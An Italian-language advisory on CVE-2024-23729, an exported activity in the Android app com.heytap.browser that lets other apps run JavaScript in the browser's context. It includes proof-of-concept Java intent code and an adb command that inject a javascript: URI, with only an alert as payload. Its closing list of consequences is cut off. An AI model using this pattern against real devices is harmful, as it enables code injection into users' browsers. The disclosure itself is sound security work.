
CVE-2024-23729
È stata scoperta una vulnerabilità nell'applicazione com.heytap.browser sulla piattaforma Android. La vulnerabilità consente a un attaccante di eseguire codice JavsScript arbitrario nel contesto dell'applicazione senza alcun permesso.
com.heytap.browserL'activity com.android.browser.RealBrowserActivity nell'app com.heytap.browser è esportata e può essere invocata da qualsiasi applicazione di terze parti senza richiedere alcun permesso. Un'app dannosa può sfruttare questa vulnerabilità per eseguire codice JavaScript arbitrario nel contesto dell'applicazione `com.heytap.browser``.
{
super.onCreate(savedInstanceState);
String javaScriptCommand = "javascript:alert%28%27Test%20Alert%27%29%3B";
Intent intent = new Intent(Intent.ACTION_VIEW);
intent.setData(Uri.parse(javaScriptCommand));
intent.setClassName("com.heytap.browser", "com.android.browser.RealBrowserActivity");
startActivity(intent);
finish();
}
adb shell am start -a android.intent.action.VIEW -d "javascript:alert%28%27Test%20Alert%27%29%3B" -n com.heytap.browser/com.android.browser.RealBrowserActivity

Lo sfruttamento riuscito consente a un attaccante di:
com.heytap.browser.